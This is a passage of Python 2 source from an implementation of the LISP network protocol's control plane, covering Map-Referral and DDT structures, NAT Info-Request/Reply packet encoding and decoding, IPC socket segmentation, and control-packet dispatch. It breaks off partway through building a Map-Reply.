if 35 - 35: I1Ii111 / I1Ii111 + o0oOOo0O0Ooo - oO0o

    def decode(self, packet, nonce, ms_json_encrypt=False):
        packet_format = "BBBBHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        self.priority, self.weight, self.mpriority, self.mweight, flags, \
            afi = struct.unpack(packet_format, packet[:format_size])

        flags = socket.ntohs(flags)
        afi = socket.ntohs(afi)
        self.local_bit = True if (flags & 0x0004) else False
        self.probe_bit = True if (flags & 0x0002) else False
        self.reach_bit = True if (flags & 0x0001) else False

        if (afi == LISP_AFI_LCAF):
            packet = packet[format_size - 2::]
            packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
        else:
            self.rloc.afi = afi
            packet = packet[format_size::]
            packet = self.rloc.unpack_address(packet)

        self.rloc.mask_len = self.rloc.host_mask_len()
        return(packet)

    def end_of_rlocs(self, packet, rloc_count):
        for i in range(rloc_count):
            packet = self.decode(packet, None, False)
            if (packet == None): return(None)
        return(packet)

class lisp_map_referral():
    def __init__(self):
        self.record_count = 0
        self.nonce = 0

    def print_map_referral(self):
        lprint("{} -> record-count: {}, nonce: 0x{}".format(
            bold("Map-Referral", False), self.record_count,
            lisp_hex_string(self.nonce)))

    def encode(self):
        first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        return(packet)

    def decode(self, packet):
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        self.record_count = first_long & 0xff
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        return(packet)
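
#
# Illustrative sketch (not part of the original module): encode() and
# decode() above agree on a 12-byte layout -- a type/record-count word
# followed by an 8-byte nonce. Defined for documentation only and never
# called.
#
def _sketch_map_referral_roundtrip():
    mr = lisp_map_referral()
    mr.record_count = 1
    mr.nonce = 0x1234567890abcdef
    packet = mr.encode()
    copy = lisp_map_referral()
    remainder = copy.decode(packet)
    assert remainder == ""
    assert copy.record_count == 1 and copy.nonce == mr.nonce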

class lisp_ddt_entry():
    def __init__(self):
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.uptime = lisp_get_timestamp()
        self.delegation_set = []
        self.source_cache = None
        self.map_referrals_sent = 0

    def is_auth_prefix(self):
        if (len(self.delegation_set) != 0): return(False)
        if (self.is_star_g()): return(False)
        return(True)

    def is_ms_peer_entry(self):
        if (len(self.delegation_set) == 0): return(False)
        return(self.delegation_set[0].is_ms_peer())

    def print_referral_type(self):
        if (len(self.delegation_set) == 0): return("unknown")
        ddt_node = self.delegation_set[0]
        return(ddt_node.print_node_type())

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))

    def add_cache(self):
        if (self.group.is_null()):
            lisp_ddt_cache.add_cache(self.eid, self)
        else:
            group_entry = lisp_ddt_cache.lookup_cache(self.group, True)
            if (group_entry == None):
                group_entry = lisp_ddt_entry()
                group_entry.eid.copy_address(self.group)
                group_entry.group.copy_address(self.group)
                lisp_ddt_cache.add_cache(self.group, group_entry)

            if (self.eid.is_null()):
                self.eid.make_default_route(group_entry.group)
            group_entry.add_source_entry(self)

    def add_source_entry(self, source_ddt):
        if (self.source_cache == None): self.source_cache = lisp_cache()
        self.source_cache.add_cache(source_ddt.eid, source_ddt)

    def lookup_source_cache(self, source, exact):
        if (self.source_cache == None): return(None)
        return(self.source_cache.lookup_cache(source, exact))

    def is_star_g(self):
        if (self.group.is_null()): return(False)
        return(self.eid.is_exact_match(self.group))

class lisp_ddt_node():
    def __init__(self):
        self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.public_key = ""
        self.map_server_peer = False
        self.map_server_child = False
        self.priority = 0
        self.weight = 0

    def print_node_type(self):
        if (self.is_ddt_child()): return("ddt-child")
        if (self.is_ms_child()): return("map-server-child")
        if (self.is_ms_peer()): return("map-server-peer")

    def is_ddt_child(self):
        if (self.map_server_child): return(False)
        if (self.map_server_peer): return(False)
        return(True)

    def is_ms_child(self):
        return(self.map_server_child)

    def is_ms_peer(self):
        return(self.map_server_peer)
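
#
# Illustrative sketch (not part of the original module): a freshly built
# node is a DDT child by elimination; setting one of the map-server flags
# changes what print_node_type() reports. Defined for documentation only.
#
def _sketch_ddt_node_type():
    node = lisp_ddt_node()
    assert node.print_node_type() == "ddt-child"
    node.map_server_peer = True
    assert node.print_node_type() == "map-server-peer"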

class lisp_ddt_map_request():
    def __init__(self, lisp_sockets, packet, eid, group, nonce):
        self.uptime = lisp_get_timestamp()
        self.lisp_sockets = lisp_sockets
        self.packet = packet
        self.eid = eid
        self.group = group
        self.nonce = nonce
        self.mr_source = None
        self.sport = 0
        self.itr = None
        self.retry_count = 0
        self.send_count = 0
        self.retransmit_timer = None
        self.last_request_sent_to = None
        self.from_pitr = False
        self.tried_root = False
        self.last_cached_prefix = [None, None]

    def print_ddt_map_request(self):
        lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format(
            "P" if self.from_pitr else "",
            red(self.itr.print_address(), False),
            green(self.eid.print_address(), False), self.nonce))

    def queue_map_request(self):
        self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
            lisp_retransmit_ddt_map_request, [self])
        self.retransmit_timer.start()
        lisp_ddt_map_requestQ[str(self.nonce)] = self

    def dequeue_map_request(self):
        self.retransmit_timer.cancel()
        if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
            lisp_ddt_map_requestQ.pop(str(self.nonce))

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))
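
#
# Illustrative sketch (not part of the original module): queued DDT
# Map-Requests are keyed by the stringified nonce, and queueing arms a
# retransmit timer that fires lisp_retransmit_ddt_map_request() after
# LISP_DDT_MAP_REQUEST_INTERVAL seconds. Defined for documentation only.
#
def _sketch_ddt_request_is_queued(request):
    return(str(request.nonce) in lisp_ddt_map_requestQ)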

LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH

lisp_map_referral_action_string = [
    "node-referral", "ms-referral", "ms-ack", "ms-not-registered",
    "delegation-hole", "not-authoritative"]

class lisp_info():
    def __init__(self):
        self.info_reply = False
        self.nonce = 0
        self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.ms_port = 0
        self.etr_port = 0
        self.rtr_list = []
        self.hostname = lisp_hostname

    def print_info(self):
        if (self.info_reply):
            req_or_reply = "Info-Reply"
            rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
                "ms-rloc: {}, private-rloc: {}, RTR-list: ").format(
                self.ms_port, self.etr_port,
                red(self.global_etr_rloc.print_address_no_iid(), False),
                red(self.global_ms_rloc.print_address_no_iid(), False),
                red(self.private_etr_rloc.print_address_no_iid(), False))
            if (len(self.rtr_list) == 0): rloc += "empty, "
            for rtr in self.rtr_list:
                rloc += red(rtr.print_address_no_iid(), False) + ", "
            rloc = rloc[0:-2]
        else:
            req_or_reply = "Info-Request"
            hostname = "<none>" if self.hostname == None else self.hostname
            rloc = ", hostname: {}".format(blue(hostname, False))

        lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
            lisp_hex_string(self.nonce), rloc))

    def encode(self):
        first_long = (LISP_NAT_INFO << 28)
        if (self.info_reply): first_long |= (1 << 27)

        #
        # Common header: type word, nonce, then zeroed key-id/auth-length/
        # TTL/reserved/EID fields (Info messages carry no authentication).
        #
        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        packet += struct.pack("III", 0, 0, 0)

        #
        # An Info-Request carries only an optional AFI=name hostname.
        #
        if (self.info_reply == False):
            if (self.hostname == None):
                packet += struct.pack("H", 0)
            else:
                packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
                packet += self.hostname + "\0"
            return(packet)

        #
        # An Info-Reply carries the NAT-traversal LCAF with the translated
        # ports and RLOCs.
        #
        afi = socket.htons(LISP_AFI_LCAF)
        lcaf_type = LISP_LCAF_NAT_TYPE
        lcaf_len = socket.htons(16)
        ms_port = socket.htons(self.ms_port)
        etr_port = socket.htons(self.etr_port)
        packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
            ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
        packet += self.global_etr_rloc.pack_address()
        packet += struct.pack("HH", 0,
            socket.htons(self.private_etr_rloc.afi))
        packet += self.private_etr_rloc.pack_address()
        if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)

        for rtr in self.rtr_list:
            packet += struct.pack("H", socket.htons(rtr.afi))
            packet += rtr.pack_address()

        return(packet)

    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        nonce = struct.unpack(packet_format, packet[:format_size])

        first_long = socket.ntohl(first_long)
        self.nonce = nonce[0]
        self.info_reply = first_long & 0x08000000
        self.hostname = None
        packet = packet[format_size::]

        #
        # Key-id and authentication length must be zero on Info messages.
        #
        packet_format = "HH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
        if (auth_len != 0): return(None)

        packet = packet[format_size::]
        packet_format = "IBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        ttl, rsvd, mask_len, eid_afi = struct.unpack(packet_format,
            packet[:format_size])

        if (eid_afi != 0): return(None)
        packet = packet[format_size::]

        #
        # Info-Request: an optional AFI=name hostname follows.
        #
        if (self.info_reply == False):
            packet_format = "H"
            format_size = struct.calcsize(packet_format)
            if (len(packet) >= format_size):
                afi = struct.unpack(packet_format, packet[:format_size])[0]
                if (socket.ntohs(afi) == LISP_AFI_NAME):
                    packet = packet[format_size::]
                    packet, self.hostname = lisp_decode_dist_name(packet)
            return(orig_packet)

        #
        # Info-Reply: parse the NAT-traversal LCAF.
        #
        packet_format = "HHBBHHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        afi, rsvd1, lcaf_type, rsvd2, lcaf_len, ms_port, etr_port = \
            struct.unpack(packet_format, packet[:format_size])

        if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)

        self.ms_port = socket.ntohs(ms_port)
        self.etr_port = socket.ntohs(etr_port)
        packet = packet[format_size::]

        #
        # Global ETR RLOC, as seen by the Map-Server.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.global_etr_rloc.afi = socket.ntohs(afi)
            packet = self.global_etr_rloc.unpack_address(packet)
            if (packet == None): return(None)
            self.global_etr_rloc.mask_len = \
                self.global_etr_rloc.host_mask_len()

        #
        # Global Map-Server RLOC; this and the remaining fields are
        # optional.
        #
        if (len(packet) < format_size): return(orig_packet)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.global_ms_rloc.afi = socket.ntohs(afi)
            packet = self.global_ms_rloc.unpack_address(packet)
            if (packet == None): return(orig_packet)
            self.global_ms_rloc.mask_len = \
                self.global_ms_rloc.host_mask_len()

        #
        # Private ETR RLOC.
        #
        if (len(packet) < format_size): return(orig_packet)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.private_etr_rloc.afi = socket.ntohs(afi)
            packet = self.private_etr_rloc.unpack_address(packet)
            if (packet == None): return(orig_packet)
            self.private_etr_rloc.mask_len = \
                self.private_etr_rloc.host_mask_len()

        #
        # Trailing list of RTR RLOCs.
        #
        while (len(packet) >= format_size):
            afi = struct.unpack(packet_format, packet[:format_size])[0]
            packet = packet[format_size::]
            if (afi == 0): continue
            rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
            packet = rtr.unpack_address(packet)
            if (packet == None): return(orig_packet)
            rtr.mask_len = rtr.host_mask_len()
            self.rtr_list.append(rtr)

        return(orig_packet)
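
#
# Illustrative sketch (not part of the original module): an Info-Request
# with a 5-character hostname encodes to 32 bytes -- 4 (type word) + 8
# (nonce) + 12 (zeroed auth/TTL/EID fields) + 2 (AFI=name) + 6 (name plus
# NUL terminator). Defined for documentation only.
#
def _sketch_info_request_length():
    request = lisp_info()
    request.nonce = 0x1234
    request.hostname = "xtr-1"
    assert len(request.encode()) == 32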

class lisp_nat_info():
    def __init__(self, addr_str, hostname, port):
        self.address = addr_str
        self.hostname = hostname
        self.port = port
        self.uptime = lisp_get_timestamp()

    def timed_out(self):
        elapsed = time.time() - self.uptime
        return(elapsed >= (LISP_INFO_INTERVAL * 2))

class lisp_info_source():
    def __init__(self, hostname, addr_str, port):
        self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
        self.port = port
        self.uptime = lisp_get_timestamp()
        self.nonce = None
        self.hostname = hostname
        self.no_timeout = False

    def cache_address_for_info_source(self):
        key = self.address.print_address_no_iid() + self.hostname
        lisp_info_sources_by_address[key] = self

    def cache_nonce_for_info_source(self, nonce):
        self.nonce = nonce
        lisp_info_sources_by_nonce[nonce] = self
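
#
# Illustrative sketch (not part of the original module): an Info-Request
# source is cached twice -- by "address + hostname" so later requests
# refresh the same entry, and by nonce so the matching Info-Reply can find
# it. Defined for documentation only; calling it mutates the module-level
# caches. The address and port values are hypothetical.
#
def _sketch_cache_info_source():
    source = lisp_info_source("xtr-1", "192.0.2.1", 10001)
    source.cache_address_for_info_source()
    source.cache_nonce_for_info_source(0xabcd)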

def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):

    #
    # On little-endian hosts the authentication words were unpacked
    # byte-swapped; restore network order before hex-concatenation.
    #
    if (lisp_is_x86()):
        if (auth1 != ""): auth1 = byte_swap_64(auth1)
        if (auth2 != ""): auth2 = byte_swap_64(auth2)
        if (auth3 != ""):
            if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
            else: auth3 = byte_swap_64(auth3)
        if (auth4 != ""): auth4 = byte_swap_64(auth4)

    #
    # SHA1-96 carries a 20-byte digest: 8 + 8 + 4 bytes.
    #
    if (alg_id == LISP_SHA_1_96_ALG_ID):
        auth1 = lisp_hex_string(auth1)
        auth1 = auth1.zfill(16)
        auth2 = lisp_hex_string(auth2)
        auth2 = auth2.zfill(16)
        auth3 = lisp_hex_string(auth3)
        auth3 = auth3.zfill(8)
        auth_data = auth1 + auth2 + auth3

    #
    # SHA2-256-128 carries a 32-byte digest: 4 x 8 bytes.
    #
    if (alg_id == LISP_SHA_256_128_ALG_ID):
        auth1 = lisp_hex_string(auth1)
        auth1 = auth1.zfill(16)
        auth2 = lisp_hex_string(auth2)
        auth2 = auth2.zfill(16)
        auth3 = lisp_hex_string(auth3)
        auth3 = auth3.zfill(16)
        auth4 = lisp_hex_string(auth4)
        auth4 = auth4.zfill(16)
        auth_data = auth1 + auth2 + auth3 + auth4

    return(auth_data)
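
#
# Illustrative sketch (not part of the original module): the zfill() sizes
# above reproduce the digest widths -- 40 hex characters for a 20-byte
# SHA1-96 hash and 64 for a 32-byte SHA2-256-128 hash. Defined for
# documentation only.
#
def _sketch_auth_hex_lengths():
    assert len(lisp_concat_auth_data(LISP_SHA_1_96_ALG_ID, 0, 0, 0, "")) == 40
    assert len(lisp_concat_auth_data(LISP_SHA_256_128_ALG_ID,
        0, 0, 0, 0)) == 64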

def lisp_open_listen_socket(local_addr, port):
    if (port.isdigit()):
        if (local_addr.find(".") != -1):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        if (local_addr.find(":") != -1):
            if (lisp_is_raspbian()): return(None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
        sock.bind((local_addr, int(port)))
    else:

        #
        # A non-numeric "port" names an AF_UNIX datagram socket; remove
        # any stale path left over from a previous run before binding.
        #
        name = port
        if (os.path.exists(name)):
            os.system("rm " + name)
            time.sleep(1)

        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(name)
    return(sock)

def lisp_open_send_socket(internal_name, afi):
    if (internal_name == ""):
        if (afi == LISP_AFI_IPV4):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        if (afi == LISP_AFI_IPV6):
            if (lisp_is_raspbian()): return(None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    else:
        if (os.path.exists(internal_name)): os.system("rm " + internal_name)
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(internal_name)
    return(sock)

def lisp_close_socket(sock, internal_name):
    sock.close()
    if (os.path.exists(internal_name)): os.system("rm " + internal_name)
    return

def lisp_is_running(node):
    return(True if (os.path.exists(node)) else False)
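
#
# Illustrative sketch (not part of the original module): internal sockets
# are AF_UNIX datagram sockets whose "port" is a filesystem path named
# after the process, which is why lisp_is_running() is a simple existence
# check. "lisp-demo" is a hypothetical node name; calling this creates and
# removes that path. Defined for documentation only.
#
def _sketch_ipc_socket_lifecycle():
    listen_sock = lisp_open_listen_socket("", "lisp-demo")
    assert lisp_is_running("lisp-demo")
    lisp_close_socket(listen_sock, "lisp-demo")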

def lisp_packet_ipc(packet, source, sport):
    return(("packet@" + str(len(packet)) + "@" + source + "@" +
        str(sport) + "@" + packet))

def lisp_control_packet_ipc(packet, source, dest, dport):
    return("control-packet@" + dest + "@" + str(dport) + "@" + packet)

def lisp_data_packet_ipc(packet, source):
    return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)

def lisp_command_ipc(packet, source):
    return("command@" + str(len(packet)) + "@" + source + "@@" + packet)

def lisp_api_ipc(source, data):
    return("api@" + str(len(data)) + "@" + source + "@@" + data)

def lisp_ipc(packet, send_socket, node):

    #
    # Don't send if the destination process isn't running.
    #
    if (lisp_is_running(node) == False):
        lprint("Suppress sending IPC to {}".format(node))
        return

    #
    # Control messages can be sent in 9000-byte segments; everything else
    # is segmented at 1500 bytes.
    #
    seg_size = 1500 if (packet.find("control-packet") == -1) else 9000

    offset = 0
    length = len(packet)
    retry_count = 0
    sleep_time = .001
    while (length > 0):
        segment_len = min(length, seg_size)
        segment = packet[offset:segment_len + offset]

        try:
            send_socket.sendto(segment, node)
            lprint("Send IPC {}-out-of-{} byte to {} succeeded".format(
                len(segment), len(packet), node))
            retry_count = 0
            sleep_time = .001
        except socket.error, e:
            if (retry_count == 12):
                lprint("Giving up on {}, consider it down".format(node))
                break

            lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format(
                len(segment), len(packet), node, e))

            retry_count += 1
            time.sleep(sleep_time)

            lprint("Retrying after {} ms ...".format(sleep_time * 1000))
            sleep_time *= 2
            continue

        offset += segment_len
        length -= segment_len
    return
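
#
# Illustrative sketch (not part of the original module): how lisp_ipc()
# chops a message, assuming the 1500/9000 segment sizes above. A
# 4000-byte non-control message goes out as 1500 + 1500 + 1000 byte
# sendto() calls. Defined for documentation only.
#
def _sketch_ipc_segment_sizes(length, is_control_packet):
    size = 9000 if is_control_packet else 1500
    return([min(size, length - offset) for offset in range(0, length, size)])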

def lisp_format_packet(packet):
    packet = binascii.hexlify(packet)
    offset = 0
    new_packet = ""
    length = len(packet) * 2
    while (offset < length):
        new_packet += packet[offset:offset + 8] + " "
        offset += 8
        length -= 4
    return(new_packet)
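
#
# Illustrative sketch (not part of the original module): the formatter
# hexlifies the packet and groups the hex into 8-character words. Defined
# for documentation only.
#
def _sketch_format_packet_example():
    assert lisp_format_packet("\x12\x34\x56\x78\x9a") == "12345678 9a "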

def lisp_send(lisp_sockets, dest, port, packet):
    send_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]

    #
    # An IPv4-mapped IPv6 address (::ffff:a.b.c.d) is sent on the IPv4
    # socket when we are an RTR, or when no IPv6 socket exists; in the
    # latter case strip the mapping prefix for the sendto() call.
    #
    address = dest.print_address_no_iid()
    if (address.find("::ffff:") != -1 and address.count(".") == 3):
        if (lisp_i_am_rtr): send_socket = lisp_sockets[0]
        if (send_socket == None):
            send_socket = lisp_sockets[0]
            address = address.split("::ffff:")[-1]

    lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
        len(packet), bold("to " + address, False), port,
        lisp_format_packet(packet)))

    #
    # RLOC-probe Map-Requests/Map-Replies (first byte 0x12 or 0x28) are
    # sent with a fixed TTL so the probed hop can validate it.
    #
    set_ttl = (LISP_RLOC_PROBE_TTL == 128)
    if (set_ttl):
        lisp_type = struct.unpack("B", packet[0])[0]
        set_ttl = (lisp_type in [0x12, 0x28])
        if (set_ttl): lisp_set_ttl(send_socket, LISP_RLOC_PROBE_TTL)

    try: send_socket.sendto(packet, (address, port))
    except socket.error, e:
        lprint("socket.sendto() failed: {}".format(e))

    #
    # Restore the default TTL if we changed it.
    #
    if (set_ttl): lisp_set_ttl(send_socket, 64)
    return

def lisp_receive_segments(lisp_socket, packet, source, total_length):

    #
    # If the first segment was the entire message, we are done.
    #
    segment_len = total_length - len(packet)
    if (segment_len == 0): return([True, packet])

    lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
        total_length, source))

    #
    # Read segments until the advertised total length has arrived.
    #
    length = segment_len
    while (length > 0):
        try: segment = lisp_socket.recvfrom(9000)
        except: return([False, None])

        segment = segment[0]

        #
        # A new message header means the sender gave up on the old
        # message; discard what we have and return the new one.
        #
        if (segment.find("packet@") == 0):
            seg = segment.split("@")
            lprint(("Received new message ({}-out-of-{}) while receiving " + \
                "fragments, old message discarded").format(len(segment),
                seg[1] if len(seg) > 2 else "?"))
            return([False, segment])

        length -= len(segment)
        packet += segment

        lprint("Received {}-out-of-{} byte segment from {}".format(
            len(segment), total_length, source))

    return([True, packet])

def lisp_bit_stuff(payload):
    lprint("Bit-stuffing, found {} segments".format(len(payload)))
    packet = ""
    for segment in payload: packet += segment + "\x40"
    return(packet[:-1])
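
#
# Illustrative sketch (not part of the original module): restoring the "@"
# (0x40) separators that lisp_receive()'s split("@") removed from a
# payload. Defined for documentation only.
#
def _sketch_bit_stuff_example():
    assert lisp_bit_stuff(["a", "b", "c"]) == "a@b@c"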

def lisp_receive(lisp_socket, internal):
    while (True):

        #
        # Read from socket; return on error (usually from a ^C).
        #
        try: data = lisp_socket.recvfrom(9000)
        except: return(["", "", "", ""])

        #
        # An external socket carries raw LISP control/data packets; no IPC
        # framing or reassembly is needed.
        #
        if (internal == False):
            packet = data[0]
            source = lisp_convert_6to4(data[1][0])
            port = data[1][1]

            if (port == LISP_DATA_PORT):
                do_log = lisp_data_plane_logging
                packet_str = lisp_format_packet(packet[0:60]) + " ..."
            else:
                do_log = True
                packet_str = lisp_format_packet(packet)

            if (do_log):
                lprint("{} {} bytes {} {}, packet: {}".format(
                    bold("Receive", False), len(packet),
                    bold("from " + source, False), port, packet_str))
            return(["packet", source, port, packet])

        #
        # An internal socket carries "type@length@source@port@payload" IPC
        # messages, possibly segmented by lisp_ipc().
        #
        all_segments = False
        message = data[0]
        bad_message = False

        while (all_segments == False):
            message = message.split("@")

            if (len(message) < 4):
                lprint(("Possible fragment (length {}), from old message, " + \
                    "discarding").format(len(message[0])))
                bad_message = True
                break

            opcode = message[0]
            try:
                msg_len = int(message[1])
            except:
                error = bold("Internal packet reassembly error", False)
                lprint("{}: {}".format(error, data))
                bad_message = True
                break

            source = message[2]
            port = message[3]

            #
            # A payload that itself contained "@" characters was split by
            # the parse above; bit-stuff the separators back in.
            #
            if (len(message) > 5):
                packet = lisp_bit_stuff(message[4::])
            else:
                packet = message[4]

            #
            # Reassemble if this message was segmented.
            #
            all_segments, packet = lisp_receive_segments(lisp_socket,
                packet, source, msg_len)
            if (packet == None): return(["", "", "", ""])

            #
            # A new message arrived mid-reassembly; parse it from the top.
            #
            if (all_segments == False):
                message = packet
                continue

            if (port == ""): port = "no-port"
            if (opcode == "command" and lisp_i_am_core == False):
                index = packet.find(" {")
                command = packet if index == -1 else packet[:index]
                command = ": '" + command + "'"
            else:
                command = ""

            lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
                len(packet), bold("from " + source, False), port, opcode,
                command if (opcode in ["command", "api"]) else ": ... " if \
                (opcode == "data-packet") else ": " + \
                lisp_format_packet(packet)))

        if (bad_message): continue
        return([opcode, source, port, packet])
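
#
# Illustrative sketch (not part of the original module): a minimal
# consumer of lisp_receive()'s 4-tuple, patterned on the receive loops
# elsewhere in this module. Defined for documentation only.
#
def _sketch_receive_loop(listen_socket):
    while (True):
        opcode, source, port, packet = lisp_receive(listen_socket, True)
        if (packet == ""): break
        if (opcode == "command"): pass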

def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
    trigger_flag = False
    timestamp = time.time()

    header = lisp_control_header()
    if (header.decode(packet) == None):
        lprint("Could not decode control header")
        return(trigger_flag)

    #
    # "source" arrives as a string; convert it to a lisp_address unless it
    # names an internal lisp-* process.
    #
    source_string = source
    if (source.find("lisp") == -1):
        addr = lisp_address(LISP_AFI_NONE, "", 0, 0)
        addr.string_to_afi(source)
        addr.store_address(source)
        source = addr

    if (header.type == LISP_MAP_REQUEST):
        lisp_process_map_request(lisp_sockets, packet, None, 0, source,
            udp_sport, False, ttl, timestamp)

    elif (header.type == LISP_MAP_REPLY):
        lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)

    elif (header.type == LISP_MAP_REGISTER):
        lisp_process_map_register(lisp_sockets, packet, source, udp_sport)

    elif (header.type == LISP_MAP_NOTIFY):
        if (source_string == "lisp-etr"):
            lisp_process_multicast_map_notify(packet, source)
        else:
            if (lisp_is_running("lisp-rtr")):
                lisp_process_multicast_map_notify(packet, source)
            lisp_process_map_notify(lisp_sockets, packet, source)

    elif (header.type == LISP_MAP_NOTIFY_ACK):
        lisp_process_map_notify_ack(packet, source)

    elif (header.type == LISP_MAP_REFERRAL):
        lisp_process_map_referral(lisp_sockets, packet, source)

    elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
        _, _, trigger_flag = lisp_process_info_reply(source, packet, True)

    elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
        addr_str = source.print_address_no_iid()
        lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
            None)

    elif (header.type == LISP_ECM):
        lisp_process_ecm(lisp_sockets, packet, source, udp_sport)

    else:
        lprint("Invalid LISP control packet type {}".format(header.type))

    return(trigger_flag)
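
#
# Illustrative sketch (not part of the original module): the dispatch
# above keys off the LISP message type, the top nibble of the first word,
# mirroring what lisp_control_header.decode() extracts. Assumes "packet"
# is a raw control message. Defined for documentation only.
#
def _sketch_control_packet_type(packet):
    import socket, struct
    first_long = socket.ntohl(struct.unpack("I", packet[:4])[0])
    return(first_long >> 28)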

def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
    ttl, timestamp):

    probe = bold("RLOC-probe", False)

    if (lisp_i_am_etr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(
            probe))
        lisp_etr_process_map_request(lisp_sockets, map_request, source,
            port, ttl, timestamp)
        return

    if (lisp_i_am_rtr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(
            probe))
        lisp_rtr_process_map_request(lisp_sockets, map_request, source,
            port, ttl, timestamp)
        return

    lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(
        probe))
    return

def lisp_process_smr(map_request):
    lprint("Received SMR-based Map-Request")
    return

def lisp_process_smr_invoked_request(map_request):
    lprint("Received SMR-invoked Map-Request")
    return

def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl,
    map_request, keys, enc, auth, mr_ttl=-1):

    probe = map_request.rloc_probe if (map_request != None) else False
    json_telemetry = map_request.json_telemetry if (map_request != None) \
        else None

    map_reply = lisp_map_reply()
    map_reply.rloc_probe = probe
    map_reply.echo_nonce_capable = enc
    map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
    map_reply.record_count = 1
    map_reply.nonce = nonce
    packet = map_reply.encode()
    map_reply.print_map_reply()

    eid_record = lisp_eid_record()
    eid_record.rloc_count = len(rloc_set)
    if (json_telemetry != None): eid_record.rloc_count += 1
    eid_record.authoritative = auth
    eid_record.record_ttl = ttl
    eid_record.action = action
    eid_record.eid = eid
    eid_record.group = group

    packet += eid_record.encode()
    eid_record.print_record(" ", False)

    local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()

    probe_rloc = None
    for rloc_entry in rloc_set:
        multicast = rloc_entry.rloc.is_multicast_address()
        rloc_record = lisp_rloc_record()
        probe_bit = probe and (multicast or json_telemetry == None)
        addr_str = rloc_entry.rloc.print_address_no_iid()
        if (addr_str in local_rlocs or multicast):
            rloc_record.local_bit = True
            rloc_record.probe_bit = probe_bit
            rloc_record.keys = keys
